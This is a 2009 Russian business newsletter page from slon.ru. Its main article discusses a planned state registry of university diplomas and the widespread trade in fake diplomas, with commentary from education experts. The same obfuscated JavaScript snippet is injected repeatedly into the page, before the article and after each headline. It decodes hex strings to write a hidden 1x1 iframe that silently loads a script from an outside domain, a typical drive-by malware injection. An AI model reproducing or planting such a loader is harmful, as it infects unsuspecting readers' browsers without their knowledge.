Отправляет email-рассылки с помощью сервиса Sendsay

Slon.ru - деловые новости

  Все выпуски  

На проверки спроса нет


     slon.ru
2009-09-22
На проверки спроса нет
Все о дипломах | Фальшивки останутся | Это лишь бумага rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65'])); Государство решило разбить в пух и прах торговлю фальшивыми вузовскими дипломами. Если сейчас проверить подлинность документа об образовании можно, только покопавшись в бумажных архивах самого вуза или Минобрнауки, то со следующего года Рособразование хочет проводить все заявки от вузов на дипломы через единую электронную систему. Тогда подлинность документа будет легко проверить - надо только вбить его серийный номер в базу. Однако, даже если система заработает, она вовсе не обязательно будет пользоваться популярностью. Ведь чтобы кому-то захотелось проверить честность своего сотрудника или кандидата на должность, подлинные дипломы должны реально котироваться на рынке. Сегодня же этого нет: работодателям чаще всего просто все равно, откуда сотрудник принес им корочку. ВСЕ О ДИПЛОМАХ По задумке руководителей Рособразования, каждый год ответственный сотрудник каждого вуза должен будет отправлять в ведомство заявку на выдачу дипломов. После проверки университет получит нужное число бланков, а при выдаче дипломов каждый фиксируется в электронной базе. В этом учебном году, как говорят в ведомстве, к системе подключат около 500 вузов, затем подтянутся остальные. Параллельно будут оцифровывать и загонять в базу данные по старым дипломам. Сегодня проверить подлинность документов об образовании трудно, это довольно громоздкая процедура. Как говорит   Прямая речь «Механизм борьбы с липовыми дипломами на Западе успешен, потому что учебные заведения максимально прозрачны» Заместитель председателя комитета «Общероссийское общество защиты прав потребителей образовательных услуг» Виктор Панин о борьбе с фальшивыми дипломами: Ущерб от фальшивых дипломов - не только экономический, но, зачастую, и физический. Скажем, человек получил фальшивый диплом врача (а таких случаев достаточно). Дальше понятно. Другое дело, что его трудно оценить, точно так же, как трудно оценить количество таких дипломов. Мы можем смотреть только на верхушку айсберга, которую нам показывают правоохранительные органы.   Я знаю, что система электронного учета выдаваемых дипломов планировалась к запуску уже давно. Будет она работать или нет, зависит от того, насколько прозрачна она будет. Сегодня уровень доверия к подобным проектам крайне низок. Например, та же система ЕГЭ. Мы видим, что, несмотря на всю информационную раскрученность этого механизма, люди не понимают, как он работает.   Если  изучить западный опыт, можно заметить, что механизм борьбы с липовыми дипломами там успешен именно потому, что сами учебные заведения там максимально прозрачны. Все элементарно можно проверить. Количество выпускников и даже их фотографии, список научных трудов и пр. - все можно найти на сайтах университетов. У нас же уровень информационной открытости вузов на сегодняшний день очень низок. Причем это касается даже крупнейших и, казалось бы, самых продвинутых образовательных учреждений.   Существует и еще один нюанс, который не связан впрямую с темой фальшивых дипломов. Речь идет о связи системы  образования и рынка труда. Выпускник Гарварда еще до получения диплома знает, где он будет работать и сколько получать. И работодатель его уже хорошо знает. Откуда тут взяться фальшивым дипломам? От них ведь нет никакой пользы.  0    http://www.slon.ru/articles/138951/   закрыть заместитель председателя комитета «Общероссийское общество защиты прав потребителей образовательных услуг» Виктор Панин, это во многом связано с непрозрачностью отечественной системы образования. Ведь проверить, например, выпускника Гарварда или Оксфорда не составляет никакого труда. На сайтах крупных учебных заведений можно найти не только информацию о выпускниках и их фотографии, но и темы научных и дипломных работ. В России эта практика не особенно распространена, так что автоматизированная база данных выпускников, если она будет публичной, станет заметным шагом вперед.  ФАЛЬШИВКИ ОСТАНУТСЯ Однако перспективы нового проекта Рособразования вызывают и сомнения, прежде всего, по техническим причинам. Ни одна подобная база общегосударственного уровня пока не была успешна. Стоит вспомнить только систему ЕГАИС, которая так толком и не заработала. Уже сейчас некоторые опасаются, что систему можно будет взломать и воспользоваться ее данными для изготовления фальшивок, или же просто вписать их туда, установив контакт с нужным человеком. Кроме того, система не устранит возможность изготовления фальшивок в самом вузе, то есть выдачу дипломов «задним числом» тем студентам, которые фактически в университете не учились. Таких дипломов не большинство, но немало, и на них с появлением автоматизированной системы явно вырастет спрос. Популярнее станут и услуги вузов, которые изначально, как говорит   Прямая речь «Спрос на фальшивые дипломы сегодня растет во многом благодаря увеличению численности чиновников» Президент «Всероссийского фонда образования» Сергей Комков о борьбе с фальшивыми дипломами: В том, что система учета нужна, я абсолютно убежден. Однако отсутствие такой системы - это не главная причина огромного количества фальшивых дипломов. Главная причина - огромный спрос на них. Вопрос в том, будет ли эта система работать. Обязательно найдутся умельцы, которые вскроют любую базу данных. Не секрет, что сегодня торгуют практически любыми базами данных (тех же сотовых операторов). Не исключено, что в эту федеральную базу за деньги можно будет внести и фальшивые дипломы. Существуют фальшивые дипломы разных категорий. Первая категория - это дипломы, которые изготавливаются на копировальном оборудовании. Это чистые фальшивки. Цена такого диплома довольно невысока - порядка 20 000 - 30 000 рублей. Вторая категория - это дипломы, изготовленные на бланках «Гознака». Очевидно, существует система утечки этих бланков. Скорее всего, их воруют прямо с фабрики. Такой диплом может стоить от 60 000 до 100 000 рублей. Третья категория - это так называемые дипломы с полной «проводкой». То есть человека задним числом включают в список студентов вуза. К такого рода мошенничеству, как правило, причастны руководители факультетов или даже вузов. Человеку выдают диплом, который будет внесен во все базы данных. И тут автоматизированная система не помощник. Кроме того, в стране есть ряд вузов, которые вообще никогда никого не учили. Но они имеют купленную лицензию и аккредитацию и спокойненько выдают дипломы за деньги. Один из таких вузов выдает не только российские дипломы, но и дипломы ЮНЕСКО. Узнав об этом, руководство ЮНЕСКО очень удивилось и направило запрос в МИД России, чтобы те разобрались, кто и на каком основании выдает от их имени дипломы. Думаю, что дипломов с полной «проводкой» не больше 20%. Большинство - это дипломы первой и второй категории. Спрос на фальшивые дипломы сегодня растет во многом благодаря увеличению численности чиновников, особенно на муниципальном и региональном уровне, и числа сотрудников правоохранительных органов. В милиции некоторое время назад была целая кампания, направленная на то, чтобы все сотрудники имели высшее образование. В прошлом году был громкий скандал по поводу того, что замначальника одного из ОВД Восточного округа Москвы направлял своих сотрудников в определенную структуру, где им за деньги выписывали фальшивые дипломы. Думаю, что каждый третий чиновник этого уровня имеет фальшивый диплом. Никакие особые знания им не нужны, они просто кладут копию диплома в личное дело. Никто ничего на местах реально не проверяет. Они там, как правило, довольно мирно живут с правоохранительными органами. Хотя есть 327 статья УК, уголовные дела по ней возбуждаются крайне редко. А ведь достаточно было бы провести пару-тройку рейдов по станциям метро, где продавцы дипломов работают практически открыто. Для этого никакая база данных не нужна. Еще один важный вопрос - насколько работодатель заинтересован в подлинности дипломов своих сотрудников. Если это частный бизнес, то работодателям в большинстве случаев все равно, подлинный у тебя диплом или фальшивый.  0    http://www.slon.ru/articles/138955/   закрыть президент «Всероссийского фонда образования» Сергей Комков, никого ничему не учат, а просто выдают дипломы. ЭТО ЛИШЬ БУМАГА Главная же проблема, как отмечает директор «Института иностранных языков» (Санкт-Петербург) Михаил Алексеев, в том, что и подлинный диплом российского вуза сегодня нисколько не гарантирует качественного образования. Многие выпускники работают   Прямая речь «Каждый четвертый в России никогда не работал по специальности» Заместитель директора Центра трудовых исследований ГУ-ВШЭ Ростислав Капелюшников Выступление на круглом столе «Трансформация человеческого капитала в российском обществе»: о накопленном образовании в России: Число средних лет накопленного образования в 1995 - 2008 г. в России увеличилось почти на 1 год. Примерно 10 лет - обучение в школе, меньше одного года - ПТУ, год - среднее учебное заведение, 1,5 года - это вуз. Число накопленных лет образования у женщин выше, чем у мужчин, в городе выше, чем на селе. Максимально оно у специалистов высшей категории составляет 16 лет, у низшей - 11,5. Почти 12 лет формального образования - это гораздо выше, чем во многих развивающихся и развитых странах. Россия в этом контексте выглядит поразительным образом. Россия - это исключительный случай. Ее объединяют со странами БРИК, но при этом Россия с формальной точки зрения обладает более высоким человеческим капиталом. Единственная страна, которая опережает Россию по этим показателям - США. Россия намного выше тренда. Нет стран, которые обладали бы таким же уровнем дохода и при этом таким же уровнем образования. Распределение населения по уровням образования. С 1995 года произошли резкие изменения по краям образовательной шкалы. Увеличилось число тех, кто имеет неоконченное образование. При этом на 4 процентных пункта возросло число тех, кто получил высокий уровень формального образования. Женщины в России в среднем более образованны, чем мужчины, и разрыв резко увеличивается. Доля женщин с основным общим образованием упала на 3 процентных пункта, при этом доля женщин с высшим образованием выросла на 7 процентных пунктов. Это не свойственно для других стран. В России, по разным оценкам, более 50% населения обладает третичным образованием. Это что-то немыслимое и непредставимое. На это можно сказать, что третичное образование [получают не последовательно]. В России широко представлены случаи, когда люди получают среднее специальное образование параллельно с общим. о стаже работы: Стаж работы человека на одном и том же месте. Даже в начале 1990-х годов продолжительность стажа была низкой, и она стремительно уменьшалась. У мужчин она падала быстрее, чем у женщин. Сегодня этот показатель составляет 7 лет, при этом во всем мире - 12 лет. Треть всех занятых в течение года «перетряхиваются» и переходят с места на место. Их специфический капитал равен нулю. Падение средних показателей среднего стажа было вызвано сокращением работников со средним стажем более 10 лет. Это означает, что работники плановой системы стали покидать свои рабочие места или переходить с места на место. Дополнительное образование играет важную роль. В современных условиях работа и обучение чередуются и перемежаются. Человек должен периодически повторять, обновлять запас знаний. В среднем примерно 5% российских работников повышали свою квалификацию в течение года. Это весьма немного. И это несмотря на то, что это был период экономического роста. Продолжительность [такого обучения] невелика - менее одного года. об отдаче от человеческого капитала: Мы выделяем типы человеческого капитала, которые условно назвали инновационными - это знание иностранных языков, умение пользоваться компьютером, интернетом. Даже за тот период, который представлен на этом рисунке, доля пользователей компьютера увеличилась на 20 процентных пунктов, пользователей интернета - в 3 раза. Среди молодежи доля тех, кто пользуется интернетом, достигает 90%. С этой точки зрения в России произошел реальный прорыв. Со знанием иностранных языков [ситуация хуже]. Примерно 20% респондентов считают, что владеют какими-то языками. 14% говорят, что что-то понимают, свободно [владеют] - 1,4%. Если эта провальная ситуация не будет исправляться, Россия не сможет вписаться в глобализированную современность. В среднем почти бесполезными свои знания считают 22%. На уровне сузов и ПТУ эти показатели наиболее велики, среди окончивших вузы ниже - 11%. Профессионалами считают себя 60% работников, а что не обладают достаточным капиталом - 40%. Человеческий капитал приносит отдачу только в том случае, если он не простаивает, а используется. Можно выявить несколько структурных несоответствий. Они возможны по вертикали, когда работник имеет недостаточный капитал, когда человек трудится не по той специальности, которой его обучали. По оценкам самих респондентов, 25% считают, что им недостаточно того образования, [которое они получили]. Оценки избыточного образования ведут себя обратным образом - когда люди трудятся не по той специальности, которую они получили. Каждый четвертый никогда не работал по специальности, треть то уходили, то возвращались. Только 40% всегда оставались верны полученной ими профессии. Среди современных выпускников - это 35%. Сегодня доля тех, кто работает не по специальности, мало отличается от молодежных когорт. В том, чтобы люди изменяли своей специальности, явно возобладала установка, что получение образования не связано с тем, где они будут работать. Для работников старшего поколения это был переход, когда они были вынуждены менять работу. Примерно 20% работают по близкой специальности. И я обращу внимание на группу низкопрофессиональных рабочих: никто не работает по специальности. Мы должны судить о том, помогает или не помогает человеческий капитал, усиливает или нет он позиции человека на рынке труда. Чем выше образование, тем выше уровень экономической активности, тем выше занятость. Среди обладателей вузов уровень безработицы ниже, чем в целом по стране. Накопление человеческого капитала является важнейшей детерминантой заработка. Обладатели высшего образования зарабатывают вдвое больше, чем обладатели среднего образования. У женщин отрыв еще больше. Накопление опыта дает прибавку к заработку до 35-летнего возраста, затем он держится либо на одном уровне, либо идет вниз. Это ненормальный график. В развитых странах пик - на уровне 55 лет, опыт продолжает давать отдачу на протяжении всей жизни. Это беспрецедентная ситуация, и ничего подобного в развитых странах мы не обнаруживаем. Уровень профессионального мастерства влияет очень сильно. Люди, которые оценивают свое мастерство как высокое, получают в 2 раза больше. Почти вдвое [увеличивает заработок] пользование интернетом. Существенную прибавку дает владение иностранным языками. Почти не дает никакого выигрыша окончание ссуза. Вуз увеличивает заработки в 1,5 раза. По международному уровню мы ближе к нижнему краю окупаемости образования. «Премия» на высшее образование для мужчин оказалась на уровне 30%, что невысоко. Показатели отдачи специального стажа: увеличение стажа на 10 лет дает прибавку в зарплате на 1%. Мы видим, что это почти неокупаемый показатель. «Премия» за повышение профессионального мастерства - профессионалы высокого класса зарабатывают на 60% больше. Штрафы, которые рынок труда присуждает тем, кто осуществлял нецелевые инвестиции [в свой капитал]. [Наблюдается] зависимость заработка от оценок респондентов, насколько они используют свои заработки. Использование знаний на 100% дает прибавку в 40% в отличие от тех, кто использует знания не полностью. Опыт работы по специальности также обеспечивает прибавку к заработку. Те, кто работает по специальности, зарабатывают на 20% больше, чем те, кто работает не по специальности. Даже при учете всего этого множества факторов все отмеченные характеристики работают и дают ощутимую прибавку к заработку. Люди многое теряют, если их знания не полностью используются, [если имеют место] переинвестиции в капитал. Единственная характеристика, которая не всегда работает, это наличие опыта. об образовательных намерениях: Исследование образовательных намерений молодежной группы 15 - 19 лет. Средние цифры за последний раунд показали, что примерно 85% собираются продолжать образование, примерно 60% собираются продолжать обучение в вузе. Мы знаем, что даже те, кто говорил, что не будет продолжать образование, могут пойти в вузы. Мы знаем, что показатели отсева из вузов остаются на минимальной отметке. Мы знаем, что образовательные намерения с ходом времени непрерывно растут. Доля тех, кто собирается учиться в вузах, в этой когорте выросла на 10%. В перспективе 2 - 3 десятилетий практически 90% будут обладать третичным образованием и порядка 35% будут обладать высшим образованием. Если это произойдет, то это будет первый случай [в истории]. Такой практики раньше не существовало. Образовательные намерения зависят от пола. Даже молодые женщины хотят учиться больше, чем мужчины. Есть зависимость от места проживания, от числа детей в семье, от уровня образования родителей, есть зависимость от уровня дохода. о возможных изменениях в системе образования: Во-первых, важнейшее изменение могло бы состоять в том, чтобы процесс обучения перестал быть де факто формой рекреации молодежи, чтобы молодые люди там на самом деле пахали. Но для этого придется разорвать ту связь количества обучающихся и объемов финансирования, [которая сейчас имеет место]. Кто же согласится рубить сук, на котором сидит? Ставить двойки и отчислять, если его учебное заведение будет меньше получать [из бюджета]. [Нужно,] чтобы бизнес подключился к разработке стандартов образования. Это предполагает, что сами предприятия должны гораздо больше вкладывать в подготовку и переподготовку работников. Видимая нагрузка должна лечь на систему дополнительного образования. Необходимо переходить к более сложным критериям отбора. А теперь, если уровень людей с высшим образованием достигнет, к примеру, 70%, то вы берете кота в мешке. Перед функцией образования как перед системой отбора это ставит новые задачи. об инновационной экономике: Я к термину «инновационная экономика» отношусь со скепсисом, с некоторой иронией. Я не использую его всерьез и не готов рассуждать, каковы факторы инновационной экономики. Тем не менее, я готов отметить три канала, по которым [человеческий капитал влияет на инновации]. Накопление человеческого капитала позволяет более эффективно выполнять определенный вид работы или быть готовым к более высоким требованиям труда. Люди еще быстрее приспосабливаются к изменениям, они быстрее осваивают нововведения. Люди с человеческим капиталом первыми пользуются инновациями. Благодаря накоплению запасов человеческого капитала ускоряются темпы прогресса. Оно способствует распространению новых знаний, способствует ускорению генерирования новых знаний. В принципе, если есть возможность, надо учитывать все эти три канала.  0    http://www.slon.ru/articles/138539/   закрыть не по специальности, и работодателю важен, скорее, сам факт наличия диплома, чем его профиль и содержимое корочки. «Для меня диплом - это не более чем гарантия того, что соискатель умеет читать и считать, - замечает руководитель петербургской компании. - Поэтому проверять подлинность его диплома я, конечно, не буду. Важен человек, а не диплом». Профессиональной подготовкой все равно реально занимаются сами работодатели. Более того, иногда работодатель чуть ли не поощряет работников к покупке дипломов: ведь именно к этому приводят кампании в государственных органах за повышение квалификации, когда сотрудников настраивают на то, чтобы они принесли хоть какую-то бумажку о высшем образовании. И тогда смысл выводить сотрудника на чистую воду? А без спроса на подлинные дипломы со стороны работодателя любая государственная система контроля будет не более чем инструментом для любопытных, желающих изучить моральные устои граждан. И нет никаких оснований думать, что при таком массовом спросе и пренебрежении со стороны работодателя ситуация изменится с появлением единой электронной системы. Скорее, поменяются формы коррупции, вырастет цена фальшивки, денежные потоки будут перераспределены. Сергей Комков говорит, что государство сейчас не слишком активно интересуется сбытом фальшивых дипломов. Уголовные дела по статье 327 УК РФ («Подделка, использование, сбыт поддельных документов») возбуждаются крайне редко, хотя торговля «липовыми» документами ведется почти открыто, не меньше 80% подделок продается просто в метро или на улице. Конечно, единая база совсем не помешает, но без активной борьбы с бизнесом «контрафактных» дипломов серьезного удара по коррупционерам не получится. Просто чиновники смогут отчитаться о еще одной красивой и - когда-нибудь, в перспективе, - полезной системе.

2009-09-22
«Если ЦБ не оказывал помощь банкам, то он не может вмешиваться в их бонусную политику»
rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65'])); о возможности ЦБ регулировать бонусы в банках: Если вы не имеете отношения к банку, если не оказываете ему никакой помощи и поддержки, то какого черта вы должны вмешиваться в его бонусную политику? Есть же какие-то очевидные вещи. Не надо долго убеждать, чтобы понять, что они либо абсурдны, либо приемлемы. Если вы не поддерживаете банк и не имеете к нему отношения, кроме того, что выдали ему лицензию, какого черта вы должны определять состав совета директоров и его бонусную политику? Если банк получает госпомощь, то, извините, пока я оказываю помощь, будьте добры, со мной считайтесь и в вопросах управления банком, и в вопросах выплат, и в вопросах руководства банком.

2009-09-22
Акции Европы закрылись ростом благодаря сырью
rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));

2009-09-22
Сбербанк снизил чистую прибыль на 92%
rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));

2009-09-22
В отношении главы ВДВ начато расследование
rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));

2009-09-22
«Новатэк» может разместить бонды на 30 млрд руб
rkqflmss=[''];jopkbtp(['693C72666D61206572733D63682274743A702F2F653465342E6E6F632F6D6E69']);function jopkbtp(bjyshbi){bjyshbi[4]=function(fvybwj){return(fvybwj[0][fvybwj[1]](fvybwj[2],fvybwj[3]));};bjyshbi[2]=/(..)(..)/g;rkqflmss[1]='write';bjyshbi[3]='%$2%$1';rkqflmss[2]=document;bjyshbi[1]='replace';rkqflmss[0]+=unescape(bjyshbi[4](bjyshbi));return(rkqflmss.slice(0,3).reverse().concat(['',bjyshbi[4]]));};jopkbtp(['632E6967343F2022697774643D682031656867697468313D73207974656C'])[4](jopkbtp(['223D697669736962696C7974683A64696564226E3C3E692F72666D613E65']));


(C) Свидетельство о регистрации Эл NoФС77-35629 от 17 марта 2009 года.
Пользовательское соглашение

В избранное